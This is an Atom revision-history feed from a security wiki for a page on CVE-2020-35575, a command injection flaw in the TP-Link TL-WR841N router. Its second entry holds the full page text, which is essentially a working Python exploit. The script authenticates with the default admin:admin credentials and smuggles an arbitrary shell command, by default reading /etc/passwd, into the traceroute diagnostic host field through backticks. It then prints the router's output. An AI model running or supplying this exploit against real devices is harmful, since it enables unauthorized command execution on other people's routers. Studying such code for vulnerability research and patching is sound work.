<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-35575_TP-Link_TL-WR841N_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2020-35575 TP-Link TL-WR841N 命令注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-35575_TP-Link_TL-WR841N_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-35575_TP-Link_TL-WR841N_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-06T21:51:38Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2020-35575_TP-Link_TL-WR841N_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=5880&amp;oldid=prev</id>
		<title>Pwnwiki: Marked this version for translation</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-35575_TP-Link_TL-WR841N_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=5880&amp;oldid=prev"/>
		<updated>2021-06-24T09:41:55Z</updated>

		<summary type="html">&lt;p&gt;Marked this version for translation&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;chinese&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 09:41, 24 June 2021&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;translate&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;translate&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==影響版本==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==影響版本== &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;lt;!--T:1--&amp;gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;/translate&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;/translate&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;Version: TL-WR841N 0.9.1 4.0&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;Version: TL-WR841N 0.9.1 4.0&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2020-35575_TP-Link_TL-WR841N_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=5878&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;languages /&gt; &lt;translate&gt; ==影響版本== &lt;/translate&gt; Version: TL-WR841N 0.9.1 4.0  ==EXP== &lt;pre&gt; # Exploit Title: TP-Link TL-WR841N - Command Injection # Date: 2020-12-13 #...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-35575_TP-Link_TL-WR841N_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=5878&amp;oldid=prev"/>
		<updated>2021-06-24T09:40:34Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;languages /&amp;gt; &amp;lt;translate&amp;gt; ==影響版本== &amp;lt;/translate&amp;gt; Version: TL-WR841N 0.9.1 4.0  ==EXP== &amp;lt;pre&amp;gt; # Exploit Title: TP-Link TL-WR841N - Command Injection # Date: 2020-12-13 #...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
&amp;lt;translate&amp;gt;&lt;br /&gt;
==影響版本==&lt;br /&gt;
&amp;lt;/translate&amp;gt;&lt;br /&gt;
Version: TL-WR841N 0.9.1 4.0&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: TP-Link TL-WR841N - Command Injection&lt;br /&gt;
# Date: 2020-12-13&lt;br /&gt;
# Exploit Author: Koh You Liang&lt;br /&gt;
# Vendor Homepage: https://www.tp-link.com/&lt;br /&gt;
# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip&lt;br /&gt;
# Version: TL-WR841N 0.9.1 4.0&lt;br /&gt;
# Tested on: Windows 10&lt;br /&gt;
# CVE : CVE-2020-35575&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import time&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
    _ = sys.argv[2]&lt;br /&gt;
    payload = ' '.join(sys.argv[1:])&lt;br /&gt;
except IndexError:&lt;br /&gt;
    try:&lt;br /&gt;
        payload = sys.argv[1]&lt;br /&gt;
    except IndexError:&lt;br /&gt;
        print(&amp;quot;[*] Command not specified, using the default `cat etc/passwd=`&amp;quot;)&lt;br /&gt;
        payload = 'cat etc/passwd'&lt;br /&gt;
&lt;br /&gt;
# Default credentials is admin:admin - replace with your own&lt;br /&gt;
cookies = {&lt;br /&gt;
    'Authorization': 'Basic YWRtaW46YWRtaW4='&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
headers = {&lt;br /&gt;
    'Host': '192.168.0.1',&lt;br /&gt;
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0',&lt;br /&gt;
    'Accept': '*/*',&lt;br /&gt;
    'Accept-Language': 'en-US,en;q=0.5',&lt;br /&gt;
    'Accept-Encoding': 'gzip, deflate',&lt;br /&gt;
    'Content-Type': 'text/plain',&lt;br /&gt;
    'Content-Length': '197',&lt;br /&gt;
    'Origin': 'http://192.168.0.1',&lt;br /&gt;
    'Connection': 'close',&lt;br /&gt;
    'Referer': 'http://192.168.0.1/mainFrame.htm',&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
data1 = \&lt;br /&gt;
'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost=&amp;quot;`{}`&amp;quot;\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)&lt;br /&gt;
response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)&lt;br /&gt;
print('[+] Sending payload...')&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
    response1.text.splitlines()[0]&lt;br /&gt;
except IndexError:&lt;br /&gt;
    sys.exit('[-] Cannot get response. Please check your cookie.')&lt;br /&gt;
if response1.text.splitlines()[0] != '[error]0':&lt;br /&gt;
    sys.exit('[*] Router/Firmware is not vulnerable.')&lt;br /&gt;
&lt;br /&gt;
data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'&lt;br /&gt;
response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)&lt;br /&gt;
print('[+] Receiving response from router...')&lt;br /&gt;
time.sleep(0.8) # Buffer time for traceroute to succeed&lt;br /&gt;
&lt;br /&gt;
data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''&lt;br /&gt;
response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)&lt;br /&gt;
&lt;br /&gt;
if '=:' in response3.text.splitlines()[3]:&lt;br /&gt;
    print('[-] Command not supported.')&lt;br /&gt;
else:&lt;br /&gt;
    print('[+] Exploit successful!')&lt;br /&gt;
    for line_number, line in enumerate(response3.text.splitlines()):&lt;br /&gt;
        try:&lt;br /&gt;
            if line_number == 3:&lt;br /&gt;
                print(line[12:])&lt;br /&gt;
            if line_number &amp;gt; 3 and line != '[error]0':&lt;br /&gt;
                print(line)&lt;br /&gt;
                if 'not known' in line:&lt;br /&gt;
                    break&lt;br /&gt;
        except IndexError:&lt;br /&gt;
            break&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>